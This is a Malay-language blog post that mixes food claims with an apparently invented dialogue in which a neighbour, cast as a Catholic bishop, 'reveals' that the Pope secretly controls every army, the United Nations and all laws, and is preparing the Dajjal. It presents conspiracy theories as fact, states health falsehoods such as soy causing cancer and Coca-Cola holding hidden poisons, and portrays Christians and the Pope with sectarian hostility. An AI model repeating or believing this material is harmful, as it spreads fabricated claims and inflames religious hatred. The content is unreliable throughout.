4. Kita diajar bahawa makan McDonalds adalah bagus, namun sebenarnya McDonalds adalah makanan yang sangat tinggi MSG dan kolesterolnya dan paling banyak lemak tepu trans.

5. Para kafir ni juga menggalakkan kita minum dan makan makanan yang langsung tak berkhasiat, contohnya coke dan maggi. Coke tu sangatlah beracun, dan ia sangat tidak bagus untuk kesihatan (gula tinggi, berasid, pH dalam lingkungan 3.5, ada racun tersembunyi). Dan para Melayu kita juga yang ketagih minum.

6. Untuk pengetahuan, para kafir agen dajjal nij juga mengwar-warkan kebaikan minum soya (sebab USA merupakan pengeluar soya terbesar), namun sebenarnya soya dapat melemahkan kejantanan lelaki dan mengurangkan kesuburan lelaki dan perempuan. selain itu juga soya dapat meningkatkan risiko kanser payudara, kanser ovari, kanser prostat, serta melemahkan otak dan tulang sbb dalam soya ada hormon estrogen yang sama dgn estrogen kat wanita. soya juga ada phytic acid yang membuatkan penyerapan kalsium, magnesium dan zinc yang penting untuk badan kita terjejas.

Secara kesimpulannya para kafir agen dajal ni bukan setakat melemahkan kita dari segi lain namun secara pemakanan kita jua.

Firman Allah:

Wahai sekalian manusia! Makanlah dari apa yang ada di bumi yang halal lagi baik dan janganlah kamu ikut jejak langkah Syaitan kerana sesungguhnya Syaitan itu ialah musuh yang terang nyata bagi kamu.

(Al-Baqarah, 168)

Dan makanlah dari rezeki yang telah diberikan Allah kepada kamu, iaitu yang halal lagi baik dan bertakwalah kepada Allah yang kepadaNya sahaja kamu beriman.

(Al-Maidah, 88)

Oleh itu, makanlah (wahai orang-orang yang beriman) dari apa yang telah dikurniakan Allah kepada kamu dari benda-benda yang halal lagi baik dan bersyukurlah akan nikmat Allah, jika benar kamu hanya menyembahNya semata-mata.

(an-Nahlu, 114)

——————————————————-

Sambung kembali dialog ……………

Aku; pak cik ni dari tadi asyik cerita tentang kehebatan org-org pak cik je…tak kan tidak ada perkara-perkara yg merisaukan pak cik….org kristian banyak masuk Islam kan…Tak kan pak cik tidak risau..tak kan gereja buat tidak tau jer…

Jiran; Sedangkan Umat Islam sendiri hilang Islamnya yg sebenar ,ini kan pula yg baru masuk Islam .. Ya.. raja kami Paus Papa Benedict pernah bagi tahu saya bahawa kami akan menemukan Muhammad sebelum dia berjaya menemukan kami kepada khalayak ramai

Aku; tapi.. org Islam percaya Imam Mahdi akan dilantik dan kemudian melaksanakan misinya

Jiran; Bagaimana jika saya kata dia tidak tahu siapa dirinya ,dia mengetahui kebenaran dan melaksanakannya hanya kerana perasaan tanggungjawab ,perlantikannya sebagai Muhammad itu kerana menandakan usahanya telah berhasil dan bukan baru bermula

Aku; kenapa dia berjuang pada waktu dirinya belum dilantik,selepas dilantik tidak boleh berjuang ke?

Jiran; Inilah yg merisaukan kami ,Al Quran dan Muhammad yg terdahulu ,tidak akan menipu tetapi ada sedikit helah yg disembunyikan drp kami ,mana mungkin dengan mudah berkata dia muncul dan dilantik ..kalau begitu senang-senang saja menemuikannya ..para Benedict ada cakap Muhammad kali ini berbeza dengan Muhammad terdahulu ,ulama’-ulama’ anda dibiarkan hidup kerana Muhammad sedikit pun tidak menyerupainya dia ..Muhammad kelihatan seperti penjenayah ,orang yg melakukan kesalahan tetapi sebenarnya dia membawa kebajikan …sedangkan kami seperti orang baik yg memperjuangkan nasib kamu .
Ya …kerana dia tidak mahu kebenaran tertanggung di bahunya ,kamu tidak akan menemui sebarang huruf -huruf abjad-abjad dan ayat-ayat dalam usahanya .

Aku; ….Habis tu siapa pula yg akan ikut Imam Mahdi?macam mana nak tahu keadaannya ?

Jiran; kalau kamu mahu tahu ..kamu datang kepada sesiapa sahaja kemudian ceritakan kebenaran kepada mereka ,selepas kamu mendapat tempat di hati mereka ..mereka akan mengatakan kamu adalah orang-orang baik dan kata-kata kamu yg paling benar …oleh itu kebenaran tertanggung di bahu kamu ,mereka melihat kamu ..nama kamu .
Kemudian kamu bersikap buruk lalu perlihatkan sahaja ragam mereka ..mereka akan mengatakan kamu adalah orang yg paling jahat ..dan kata-kata kamu adalah paling dusta ..mereka melihat kamu..nama kamu …
Mereka adalah orang yg paling lemah kerana mereka memerlukan kebaikan kamu untuk membuat keputusan sama cerita kamu benar atau dusta . Orang yg gagah tidak memerlukan kebaikan untuk memutuskan sesuatu itu samda baik atau buruk dan tidak memerlukan kejahatan untuk memutuskan sesuatu itu dusta .
Mereka ini adalah orang-orang yg akan menyertai Muhammad “permata yg hilang dari tangan orang Mukmin akan kembali semula kepada tuaannya kerana mereka orang yg sudi menerima nya tidak kira bagaimana ia datang ..dan mereka adalah orang-orang yg benar -benar yakin kebenaran adalah milik tuhan dan Muhammad hanya sebagai penyampai

(Jadi …selepas jiran aku cakap seperti ini aku pun ‘test power’ la kebenaran yg aku cerita kepada para pembaca …aku nak tau golongan mana yg jiran itu maksudkannya)

————————————-

Komen Efery ……………..

Sehebat mana perancangan mereka, perancangan Allah lagi Maha hebat.

…mereka menjalankan tipu daya dan Allah menggagalkan tipu daya (mereka), kerana Allah sebaik-baik yang menggagalkan tipu daya.

Al-Anfal 30————————-

Sambung perbualan

Aku; saya tengok kan…… pak cik dengan kawan-kawan pakcik dan paderi muka lebih kurang sama saja..malah muka paus macam muka pak cik,muka pak cik macam muka Paus…sekarang ni susah nak bezakan wajah Yahudi dengan orang-orang Amerika,Eropah..semua lebih kurang jer…mengapa ya ?

Jiran ; Orang seperti kamu melihat wajah manusia ,itulah yg kamu katakan ..tapi bila kami melihat wajah manusia ..tembus ke lubuk hati mereka ..apa yg kami lalui sehari-harian ,apa yg ada di jiwa sehingga menyebabkan wajah mereka seperti itu seperti ini ..

Aku ; apa kaitan kehidupan seharian dgn jiwa dgn wajah…setakat muka,alat solek pun boleh tukar muka….

Jiran; (PAUS) PAPA BENEDICT paling arif akan hal ini ..kami gelarkan dia sebagai “MILLON SOUL MAN”….Ya ada bejuta-juta jenis manusia di dunia ini ,perbezaan jiwa-jiwa ini sangatlah kecil umpama tebal kertas dibelah 1000 . seorang yg namanya paus mampu menghitung satu persatu walaupun di hadapan mereka ada jutaan manusia ..itulah kemampuan Muhammad dan kawan-kawannya dahlulu yg menjadi milik kami sekarang…
Perasaan kamu itu terhasil dari gerak balas terhadap barangan buatan kami ,kami lakukan setiap hari seperti air yg menitis menjadi lopak .bila lopak itu kelihatan ia sudah menjadi jiwa ..huruf ,adjab tidak layak menjadi bahasa .. maka wajah kamu adalah sebaik-baik bahasa yg layak menerangkan apa yg tersirat di dalam jiwa kamu ,tampan atau hodoh bukannya ukuran yg menjadi ukuran ialah terang atau malapnya cahaya wajah kamu itu

Aku; tadi pak cik cakap ada berjuta jiwa manusia…banyak sangat,macam mana boleh jadi macam tu..yg saya lihat manusia ni cuma ada 4 jenis jiwa je….jahat,sederhana,baik dan sangat baik..tapi gereja nampak ada berjuta-juta jenis pula …pelik dan ajaib….

Jiran ; Sebab itu kami wujudkan pelbagai aktiviti kehidupan manusia yg tiada zaman Muhammad dahulu ..sehingga hari ini ada pelbagai peranan manusia yg palsu ..dari kecil kamu ke sekolah ..kemudian ke universiti dan bekerja ..di dlmnya terdapat berjuta-juta pekerjaan ..maka berjuta-juta aktiviti maka terhasilah berjuta -juta jiwa …
Manusia sangat bodoh ..mereka amat menyangi pekerjaan ,malah kami batkan mereka tersepit jika tiada pekerjaan ..oleh itu mereka menyangi ..malah berebut-rebut utk memilikinya ….

Aku; untuk apa org-org pak cik mewujudkan berjuta-juta jiwa manusia…apa orang-orang pak cik dah buat… tapi betul juga sbb pak cik ni sendiri tidak bekerja…sembayang je kuat..

Jiran ; Ada pelbagai jenis agama di dunia ini .wajah -wajah mereka bergantung kepada agama yg mereka anuti .diantara mereka berbeza dan boleh dikenali ..oleh itu kami berusaha untuk melucutkan wajah -wajah agama ini drp mereka ..maka kami cipta pelbagai aktiviti yg kamu lihat pada hari ini ..maka wajah mereka akan kelaihatan sama saja ..dan jiwa mereka sudah tentu sama..
Misalnya begini ..cuba kamu lihat wajah orang yg berumur 20 tahun pada hari ini ..dan kemudian lihat wajah orang yg mempunyai umur yg sama ..tetapi hidup 30 tahun yg lepas ?

(ni yg susah…aku termenung sekejap,akal aku balik ke Malaysia sebentar…mmm..amoi,karu, awek ..)

Aku; betul juga ye….sbb macam di Malaysia,perbezaan generasi memag ketara…muka org-org muda, melayu dah macam cina,cina dah macam melayu..bohsia dah macam amoi,amoi dah macam bohsia…kadang-kadang tengok gambar di myspace,friendster..susah nak cam apa bangsa mereka …(tau pula dia bohsia,amoi,myspace semua tu..hehe)

Jiran; Mereka yg berjuta-juta jiwa itu kami gabungkan kehidupan mereka utk menghasilkan satu wajah manusia yg baru , jiwa manusia yg baru jiwa tanpa agama padanya ,yg tidak terdapat di mana-mana zaman sebelum ini dan mereka itu adalah pemilik wajah yg kamu panggil mereka “cute” .
Lihatlah orang seperti mereka semakin membanjiri dunia ini ..semakin melimpah memenuhi bangsa dan agama ..maka tamatlah riwayat agama dunia …

Aku;mereka yg berwajah “cute” ???..macam org-org saya bangsa melayu..tapi memang saya perasan muka mereka sudah tidak macam melayu,macam org agama budha..tapi tidak juga…ini suatu fenomena ajaib..

Jiran; Lihat saja dimalam maya ..mereka betul-betul menyukai wajah mereka malah merasa bangga padahal mereka tidak menyedari kerosakkan jiwa dan mereka golongan yg PALING BERPOTENSI UNTUK DIMURTADKAN, menyembah kami sedikit masa lagi …

Aku; macam mana orang-orang pak cik menghitung potensi mereka untuk diperlakukan begitu?

Jiran ; Kamu datang kepada mereka ,kemudian kamu suruh mereka membenci wajah mereka ..mereka akan berkata adakah kamu gila ..dan ingatlah bahawa tuhan Muhmmad telah memberikan kami ramai pengikut dari kaum HAWA…

Aku; kalau begitu…golongan ini telah dipersiap-siapkan untuk dajjal ke?

Jiran ; Ya ..mereka adalah golonagn paling lemah .Jiwa-jiwa mereka bergantung sepenuhnya dengan barang buatan kami ..dan mereka yg tidak sempat didatangi Dajjal akan diuruskan oleh Lucifer
Lucifer akan datang pada waktu saatnya ajal hampir keluar dan memberi tawaran akan pertolongan dari sakitnya maut ..dan mereka akan dihantar ke neraka selama-lamanya …dan ia telah berlaku

Aku : Ah mengarut mana buktinya?
(aku rasa terkejut…kali ini baru jiran ketawa tetapi dgn cara yg sopan )

Jiran ;Baru-baru ini penjaga makam Muhammad ,dia membaca Al Quran di sisi makam dan tertidur kemudian dia bermimpi bahawa Muhammad datang kepadanya dan mengatakan bahawa dalam 60,000 orang Islam yg kembali kepada tuhannya ,tiada seorang pun yg benar-benar beriman kepoada tuhannya dan kamu tahu Lucifer tidak diizinkan untuk menyamar sebagai Muhamad

(pergh……cuak juga aku dengar,macam mana mereka boleh survey macam ni sekali,berdasarkan wajah..dan create suatu kehidupan yg melahirkan bangsa yg anda suka, kata bila nampak je kita kata ….”cute nya awek ni”)

(aku rasa mereka yg muka macam ni dlm pemerhatian gereja….rupa-rupaya nya mereka benar-benar tahu diri kita lebih dari kita sendiri….”cute” banyak maksud )

Apabila membaca petikan di atas saya terfikir, Bishop ini tahu juga bahawa Iblis/ Lucifer tidak diizinkan menyerupai Rasullulah. Saya ingatkan hanya umat Islam yang tahu tentang perkara ini.
Saya teringat pengalaman seorang sahabat saya. Beliau terpaksa mengikut bosnya untuk masuk ke dalam gereja kerana ada kerja yang perlu diselesaikan. Sebaik sahaja beliau melangkah masuk ke dalam gereja, Paderi di dalam gereja terus menghalau beliau keluar kerana Paderi itu tahu dia ialah seorang Islam. Sedangkan mukanya mirip-mirip Cina dan beliau terus keluar. Bagaimana Paderi itu tahu sahabat saya itu adalah seorang Islam? Mungkin inilah yang dimaksudkan oleh Bishop itu. wajah manusia bergantung kepada agama yang mereka anuti.

Jiran ; Perangai orang-orang Islam sungguh kelakar ..apakah hati mereka semua sudah buta …adakah kami perlu cederakan sebelah mata kami sendiri supaya mereka berkata “oh rupa-rupanya inilah orang yg ditunggu-tunggu ..padahal kami sudah singgah di kuil Sulaiman @ masjidil Aqsa ..sekejap lagi kami akan ketengah-tengah bumi ..
Kebodohan orang-orang Islam sangat menakjubkan ..sebelum ini pernah datang Paus ke sini ( New York )menyambut hari jadinya yg ke 81 ..ya ia di sambut di ground zero ramai orang datang ,mereka sayang kepada paus….

Aku;….eh, itu kan tempat world trade centre (WTC) runtuh..kenapa buat di situ pula…

Jiran; Sebelum rombongan Vatican terbang ke sini ..Paus bergurau dengan seorang MONSIGNOR..dia berkata ..saksikanlah ..orang-orang Islam akan melihat saya berbahagia di mana tempat itu telah memberi izin utk peluru dihadiakan kepada mereka
“Sangat berbahaya tuan datang ke sana mahu saya hantar semua ‘CANTUS’ untuk lindungi tuan?”..kata MONSIGNOR..
Paus pun berkata biarkan ‘CANTUS’ tidur puas-puas ..kemudian saja kita kejutkan ‘CANTUS’ bila Muhammad datang nanti ”…

Paus pula berkata kepada MONSIGNOR “Tidak perlu nak dirisaukan selagi saya tidak mencederakan sebelah mata saya ..bukankah saya menyambut hari jadi saya saja ?”…
Saya sungguh harian ,bila kami kata Paus menyambut hari jadi ..maka org –org Islam pun akan kata ..dia cuma sambut hari jadinya saja ..bukan ada apa-apa pun ”
Rupa-rupanya kebodohan org-org Islam lebih bodoh dari kami jangkaan kami ..kebodohan ,mereka mengatasi usaha kami untuk memperbodohkan mereka ..menakjubkan

(ini dah lebih!..dari tadi sedap je cakap Islam bodoh..ikut kan hati nak je aku tampar laju-laju je muka dia…tapi sabar je la)

Aku ; tadi pak cik ada cerita yg Monsignor ada cakap tentang CANTUS…apakah maksud nya ‘CANTUS’ tu….bunyi macam gempak jer..

Jiran ; Cantus adalah warisan ‘KNIGHT TEMPLAR’….suatu amanah yg kami berikan kepada mereka kerana ketaatan mereka kepada PADERI,BISHOP,KARDINAL dan semua pemimpin –pemimpin Roman Katolik ..
Kami berikan suatu kuasa kepada mereka , kuasa yg meliputi semua penjuru dunia .mereka pergi ke mana saja tanpa banyak tanya kepada Paus…
Selepas penjajahan Eropah ke atas dunia …KNIGHT TEMPLAR telah menyerahkan warisan ini kepada kamu bukan kepada org Islam sahaja bahkan semua jenis agama di dunia ini …

Aku; ni satu lagi…mengarut,bila masa pula kami memikul warisan Knight Templar? Kerajaan sesebuah negara kan milik rakyat sendiri selepas kemerdekaan..

Jiran ; Di tanah air kamu dahulu bapa-bapa dan datuk-datuk kamu tidak sedarpun mereka telah bekerja untuk KNIGHT TEMPLAR…nyawa mereka telah kami gunakan untuk membunuh komunis di sebelah pihak komunis telah menggunakan komunis untuk membunuh kamu …kedua-duanya mati ..KNIGHT TEMPLAR benar-benar anak didik kami…
Datuk-datuk kamu itu sebenarnya mati sia-sia ,mereka semua akan masuk neraka ..mati syahid kononnya .

Aku; yg ni lagi kelakar…betul la datuk-datuk kami memperjuangkan tanah air..bila masa pula datuk-datuk kami diperalatkan oleh knight templar?…apa buktinya..?

Jiran ; Sekarang ini mereka menjalankan tanggungjawab dan peranan dengan perasaan bangga ,malah ramai orang-orang muda bercita-cita utk mnyertainya ,mereka sudah mengaggap sebagai kerjaya ..mereka benar-benar menyangi kerjaya itu dan kami telah beri mereka pakaian yg indah kepada mereka ..mereka benar-benar suka kan pakaian itu malah berebut-rebut memakainya …orang –orang yg mereka lindungi memandang mereka sebagai wira ..padahal mereka sendiri tidak tahu apa yg ,mereka lakukan dengan siapa sebenarnya mereka berkhidmat .

Aku; pak cik berkata tentang pakaian?….pakaian apa yg mereka pakai sampai mereka tidak tahu untuk siapa mereka bekerja??

Jiran; Mereka itu memakai simbol warisan KNIGHT TEMPLAR pada pakaian mereka di bahu dan lengan mereka ada terdapat pingat yg menunjukkan mereka telah diiktiraf akan menjalankan fungsi yg telah kami kehendaki ..tetapi mereka tidak menyedari nya…
Pingat itu seperti kelihatan huruf “ V” itulah simbol “CANTUS”…warisan KNIGHT TEMPLAR…
Itu adalah permulaan sahaja sebelum kamu menjadi orang yg lebih bodoh lagi apabila menerima pingat yg lebih besar ….…

Aku; huruf ‘V’ pada bahu dan lengan???…..Bukankah tentera polis anggota keselamatan dan badan beruniform seperti pengakap ,kadet dan semua tu????

Jiran ; Ya maka saksikanlah bahawa semua angkatan tentera di seluruh dunia adalah milik gereja tidak kira kamu negara apa sekalipun kamu semua sedang berkhidmat dengan Paus !!

Aku; ini mustahil!!!!……bukan ke setiap negara di dunia ini memiliki ketenteraan masing-masing ? habis tu selama ini perang yg berlaku di mana-mana saja apa ertinya ? sedang mereka itu milik gereja ?

Jiran; Buka mata kamu dan lihat dunia ..semua tentera di dunia ini tidak kira negara besar USA , British , Perancis , China ,India ,Jepun ,Iran malah negara kamu Malaysia ….semua mereka memakai pakaian dan pingat yg sama…Dan mengapa mereka semua tidak memakai pakaian mengikut budaya dan agama masing-masing ?..Paus berkuasa untuk menggunakan sesiapa sahaja di antara mereka untuk dikorbankan ….

(aku ingat jubah universti je sama dengan paderi…baju tentera pun sama juga mana-mana negara,kalau ada beza pun sedikit sangat)

(terpikir pula aku mereka yg bergelar,koperal,lans koperal,sarjan,inspektor,mejar…mereka tu tahu ke pasal ni?)

(tapi yg mcm selalu bishop kata…”mereka sendiri akan mempertahankan pakaian mereka,kami pihak gereja tidak perlu buat apa-apa pun”…..kalau bagi tau mereka pun , kita yg kena tembak mati,tak pun.. sumbat I.S.A! )

(Paus pun berkata ..biarkan cantus tidur puas-puas ..kemudian apabila Muhammad datang kita akan kejutkan … apakah sebenarnya yg mereka maksudkan itu … ????)

————————————————–

Komen Efery

Simbol ‘V’? Selepas saya membaca perbualan di atas, barulah saya perasan tentang lambang tersebut yang digunakan oleh tentera di seluruh dunia untuk melambangkan pangkat mereka. Dan simbol ‘V’ itu juga adalah secret sign Illuminati, sila baca artikel saya berikut, Klik Sini!
Berkenaan Cantus, istilah itu tidak pernah saya dengar sebelum ini, mungkin itu adalah kerahsiaan tahap tinggi yang didedahkan oleh Bishop tersebut.
(jiran baru saja pulang selepas mendapat undangan dari gereja St.Peter Basilica,Vatican kerana ada urusan penting dan mesyuarat dgn 2500 orang bishop di suatu tempat yg dia enggan bagi tahu aku tempatnya di mana..)
———————————————————————————————————–

Aku ; apapasal pak cik nampak sibuk je…selalu outstation je, buat apa…org Islam pergi haji di Mekah…pak cik pergi Vatican pula,Vatican ada buat haji juga ke ?
(aku rasa macam nak ketawa…haha,saje je perli dia)

Jiran; Gagaimana kamu boleh ketawakan saya padahal setahun dua ini adalah haji yg terakhir bagi umat Islam ..kamu sudah berkahwin?

Aku; belum lagi…kenapa pak cik tanya?

Jiran ;…Sekarang ini adalah keturunan Islam yg terakhir melangsungkan perkahwinan ..jika kamu tidak melangsungkan perkahwinan kamu dalam setahun dua ini kamu akan menyesal seumur hidup …
Tidak ada lagi kesempatan untuk berumah tangga apabila PAUS ROMAN PETER II dilepaskan dari rantai yg mengikatnya sejak sekian lama ..umat Islam sendiri yg menyebabkan rantai itu terputus …

Aku ; ni apapasal pula yg terakhir haji la,kawin la….siapa Peter tu? ..yg terakhir juga ke…?.

Jiran ; Akan sampai masanya kami akan tanggalkan pakaian kami ,kami tidak perlukan ini semua ,kami pula yg akan menuntut segala hutang-hutang budi yg manusia ambil drp kami sedangkan selama 1000 tahun kami bersabar ,kami tidak ambil sedikit pun nikmat kehidupan dari kamu ..malah hanya cukup –cukup saja makan minum utk jasad kami ..sekarang kamu akan bayar harga dunia yg kami binakan untuk kamu ….
PAUS BENEDICT XVI sudah hampir seslesai pekerjaannya ..sedikit lagi masa sebelum VATICAN melepaskan penghulu segala PAUS ”
…YA.. PAUS ROMAN PETER II…
Dia adalah paus yg paling hebat ,paus yg paling agung paus yg terakhir sebelum hari pengadilan ..dia akan menunggu Muhammad datang ..habislah Muhammad nanti

Aku; sungguh misteri org-org pak cik ni…kami org Islam percaya yg Nabi Isa a.s akan berpihak kpd Imam Mahdi…padahal org-org pak cik adalah pengikut Isa ibnu Maryam,siapakah sebenrnya gereja sehingga Nabi Isa sendiri tidak berpihak kepada Kristian….macam mana dengan Paus?.. apa kedudukan dia apabila Nabi Isa a.s turun ke dunia nanti?

(jiran tidak menjawab sepatah haram pun,dia hanya membisu dgn senyuman sinis

———————–

Ini adalah bahagian yang paling menarik perhatian saya dan banyak pertanyaan saya sebelum ini yang kabur-kabur terjawab. Perhatikan kata-kata Bishop tersebut.

Tidak ada lagi kesempatan utk berumah tangga apabila PAUS ROMAN PETER II dilepaskan dari ikatan rantai yg mengikatnya sekian lama ….Umat islam sendiri yg membuatkan rantai itu terputus …
Rantai yang mengikatnya? Tidakkah anda perasan bahawa ada juga makhluk Allah yang telah dirantai sekian lama. DAJAL! Sabda Rasullulah:
Dajjal itu sudah wujud sejak beberapa lama. Ia dirantai di sebuah pulau dan ditunggu oleh seekor binatang yg bernama “Al-Jassasah”
Sahih Muslim

Adakah mungkin Pope Roman Peter II ini adalah Dajal? Saya pernah mengadakan perbincangan dengan seorang pengkaji, beliau mengatakan umat Kristian percaya bahawa Pope Peter II inilah yang akan menyelamatkan mereka dari Antichrist/ Dajal. Tetapi pada pendapat saya, mungkin Pope Roman Peter II adalah Dajal. Umat Kristian akan terus sesat dan disesatkan oleh Pope Roman Peter II ini. Jika benar Pope Roman Peter II ini adalah Dajal, maka dia akan perintah dunia melalui Jurusalem sepertimana dalam ceramah Maulana Imran N. Hosein. Jika seseorang itu menjadi Pope, sudah pastilah pusat pemerintahannya akan berpusat di Vatican, bukan Jurusalem. Macam mana ini?
Sebelum ini saya ada mendengar desas desus yang mengatakan pemerintahan Vatican akan berpindah ke Jurusalem tidak lama lagi, tetapi masa itu saya tidak tahu apa tujuan pemerintahan Pope dipindahkan ke Jurusalem. Sekarang saya sudah dapat mengetahui kenapa perlu Vatican berpindah ke Jurusalem. Ini kerana masanya sudah hampir dan The Last Pope akan dilantik dan memerintah dari sana! Pope Peter II itu kemungkinan besar adalah Dajal, kerana dia akan memerintah dari Jurusalem dan dirantai sejak sekian lama.

The Bible apparently indicates that very near the end of time, the Pope will actually quit
Rome, and move to Jerusalem, in order to exercise control over the glorious holy mountain of God, which is the explicit stated goal of Satan.
Sumber Petikan Teks Di Atas

Mungkin sesetengah penganut Kristian mengangap Vatican akan menyelamatkan mereka dari Antichrist. Tunggu dulu, perhatikan lambang salib di belakang Pope dalam gambar di bawah. Salib Terbalik yang melambangkan Antichrist itu sendiri!

———————————-

Sambung lagi dialog ….

Aku; tadi pak cik cakap pekerjaan Paus Benedict xvi dah nak selesai..apa yg dia dah buat?…kenapa ada org ganti dia…apapasal tidak terus terus lead sampai kiamat jer?

Jiran; Paus sudah tua ,jasad manusia ada usia tetapi jiwa tiada usaha ,jiwa boleh diserahkan pada jasad yg masih hidup ..tiada masalah bagi mana-mana Paus ,jiwa boleh diserahkan pada jasad yg masih hidup ..tiada masalah bagi mana-mana Paus ..jika jasad mereka mati ..jiwa mereka akan di sambung oleh paus yg seterusnya
Paus-paus yg terdahulu telah melahirkan seoarng hamba ..hamba yg diberikan oleh Paus suatu kuasa yg akan menemui sesiapa sahaja ”
Seseorang hamba yg akan menemui kamu tanpa jasad Paus di depan kamu ,hamba ini akan pergi ke setiap manusia yg bernyawa ..ya ..begitu pantas ia datang apabila bayi-bayi baru saja keluar dari rahim ibunya ,selepas itu hamba ini akan mengikut sehingga sejauh mana usia bayi itu ..dan hamba ini buta ,ia tidak mempunyai rupa dan tidak mempunyi nama

Aku; siapa hamba yg paus xii lahirkan tu?…ni berkaitan manusia atau apa?

Jiran; PAUS PIUS XII pernah berkata siapakah jasad tanpa jiwa dan siapakan jiwa tanpa jasad ?”
Pekerjaan para Paus menyebabkan lidah – lidah manusia berkata pecah dan perintah telah diajarkan kamu dengan perbezaan warna kulit padahal kami menghasilkan lebih harus lagi ……Pecah dan perintah ke atas warna kulit kamu sudah dilakukan dengan meletakkan suatu kaum di suatu wilayah yg kamu kata ia sebagai “negara ”
…Selepas itu pecah dan perintah ke atas hati-hati kamu pula ..sungguh menakjubkan sehingga hari ini kamu masih memahami ia sebagai perbezaan warna kulit
Selain Muhammad dan kawan-kawannya ,hanya kami sahaja yg mengerti apa itu Demi Tuhan yg jiwa Muhammad di tangan-Nya ” Sekarang ia telah menjadi Demi tuhan yg jiwa –jiwa manusia di tangan Paus ”
Muhammad sungguh bijaksanan ..Muhammad hanya memebenarkan wujud hubungan tuhan dengan makhluknya ,rasul dan dan umatnya ,raja dan rakyatnya ,ibu bapa dan anaknya ,tidak ada hubungan lain ..
Kami telah wujudkan pelbagai hubungan manusia dengan watak kehidupan palsu cthnya sebuah perniagaan mesti perlu ada orang yg bernama pengarah ,timbalan pengarah ,setiausaha ,eksekutif dan lain-lain ..watak ini lah yg akan pecah dan perintah hati-hati kamu
Bodoh benar org –org Islam tidakkah mereka terfikir mengapa watak-watak ini tidak wujud pada zaman Muhammad dahulu ?….
Dan kamu juga di ajar supaya merasa kaum yg bodoh sekiranya watak-watak tadi tidak wujud di dlm kehiduan kamu …

Aku; nanti sekejap pak cik….adakah ini yg dikatakan “hamba” paus …Tidak ada sebarang symbol pun seperti sebelum ni….

Jiran; Ada ..para paus telah menamakan hamba ini sebagai “BENEDICTINE ORDER”
Ya..BENEDICTINE ORDER….ia sangat persis untuk mengetahui jiwa-jiwa manusia samada mereka menyembah tuhan Muhammad atau menyembah Lucifer .

Aku; la…ingatkan org tadi…benedictine order…order…adakah ia suatu seperti peraturan atau undang-undang ??

Jiran; BENEDICTINE ORDER adalah segala perkara di dunia ini yg tertulis ia sebagai ilmu ,maka terjadilah diri kamu seperti hari ini ..bukan mudah nak membuatkan kamu menerima ia sebagai ilmu …

Aku; kenapa pak cik perlu buatkan kami menerima ia sebagai ilmu?

Jiran; Sebab ilmu itu sebenarnya adalah undang-undang ..ilmu adalah undang –undang utk jiwa kamu ..dan undang-undang bertulis yg ada di dunia ini masih sebagai undang-undang tetapi untuk jasad kamu ..cthnya ilmu sains ..mengapa ia di ajr dlm bentuk ilmu bukan sebagai undang-undang ..sudah pasti kamu tidak akan belajar sekiranya ia di ajar dlm bentuk undang-undang kerana kamu akan lihat ia sebagai suatu bentuk paksaan ..
Para Paus telah amanahkan “BENEDICTINE ORDER” ini kepada UNITED NATION (UN)…

Aku; UNITED NATION (UN)!!!…PERSATUAN BANGSA-BANGSA BERSATU!!!!!…….gila ke ape dunia ni???mengarut lah pak cik PBB kan selalu buat kebajikan,tolong negara miskin dan jadi rujukan mana-mana masalah negara-negara dunia ni….pak cik jgn cakap sembarangan..

Jiran; “BENEDICTINE ORDER IS SYMBOLIZE BY THE OLIVE WHEAT AND GRAIN”…dan kamu lihat UN menggunakan simbol BENEDICTINE …..dan para paus telah membina perjuangan yg akan diselesaikan oleh paus yg akan datang …..

(perasan juga aku yg logo PBB itu memang ada symbol Benedictine…planet bumi di dalam, diluarnya ada symbol mengelilingi bumi tu macam padi,bentuk gandum pun ada,macam daun zaitun pun ada…tapi ada dua,kanan dan kiri)

Saya tahu apabila kamu mendengar UNITED NATION…difikiran kamu akan terbayang suatu kuasa besar ..dari sebesar undang-undang sehinggalah sekecil-kecilnya dilaksanakan ,pertama kali BENEDICTINE ORDER datang kepada kamu apabila kamu lahir saja kena daftar sijil lahir sehinggalah jika kamu mati pun kena daftar ..maka ketika itu barulah BENEDICTINE ORDER terpisah drp kamu .
..apa saja yg namanya undang-undang ia adalah BENEDICTINE ORDER

Aku; ah….tak mungkin lah pak cik…bukan ke setiap negara ada peruntukan dan menggubal undang-undang sendiri???..macam mana pak cik kata semua undang-undang di dunia ni milik gereja???

Jiran;Saya tidak menipu kamu ..lihat saja di mana-mana negara sekalipun ,pada bendera ,jata ,mahkamah ,perlembagaan dan apa saja yg seumpanya mereka memakai simbol SIMBOL BENEDICTINE….
‘CANTUS’ dan BENEDICTINE macam adik beradik mereka tidak boleh dipisahkan …

Aku; undang-undang untuk jiwa???….kalau benedictine order untuk undang-undang jasad manusia dah ada symbol pada jata,bendera,perlembagaan semua tu…Benedictine order untuk undang-undang jiwa manusia apa pulak???

Jiran ; Ini adalah yg paling berat sekali bagi kamu ..katakanlah pada saya yg kamu tidak ingin mengetahuinya ..

Aku; Tak kisah lah hati saya pedih menerimanya..pak cik cakap saja la..

Jiran; Muhammad dan kawan-kawannya tidak membenarkan ilmu suatu yg memberikan harga kepada diri sendiri …maka kami hasilkan perkara-perkara yg berlawanan dengan Muhammad kawan-kawannya
tiap perkara yg kamu lalui sehari-harian akan membentuk jiwa-jiwa kamu .semasa kanak-kanak di ajar menggunakan pacaindera kamu di ajar bagaimana ilmu itu boleh meresap di otak kamu …kamu diajar membaca ,menulis ,mengira ,mewarna ,bermain ,berlari ..Selepas itu kamu ditanya ..bila sudah besar nanti nak jadi apa ? apa cita-cita kamu nanti ? ..kamu diajar ..bila sudah besar nanti saya nak jadi doktor ..saya nak jadi peguam dll..perbezaan jiwa belum wujud tetapi fungsi-fungsi watak sudah kamu fahami .
Selepas itu kamu akan diajar fungsi-fungsi ilmu ,bagaimana ia berfugsi ,bagaimana setiap ilmu mengikut maknanya sendiri ,kamu akan kagum dengan ilmu dan percaya kan ilmu…selepas itu kamu dipisahkan dengan orang lain ..kamu diajar untuk menilai ..pelajar pandai dan pelajar bodoh
Pelajar pandai mendapat pujian dan pelajar bodoh dimarahi ibu bapa mereka ..ini adalah asas memecah belahkan kamu … tetapi kamu diajar ..perpaduan antara kaum ..supaya kamu percaya warna kulit lah yg menyebabkan perpecahan padahal perbezaan ilmu adalah senjata ..
Ilmu yg berbeza maka pekerjaan kamu berbeza ..maka berbezalah duit kamu ,berbezalah rumah kamu ,maka berbezalah maruah kamu .maka berbezalah perhiasan kamu ..kemudian kamu di ajar miskin dan kaya tiada beza .. maka lupalah kamu bagaimana ia bermula
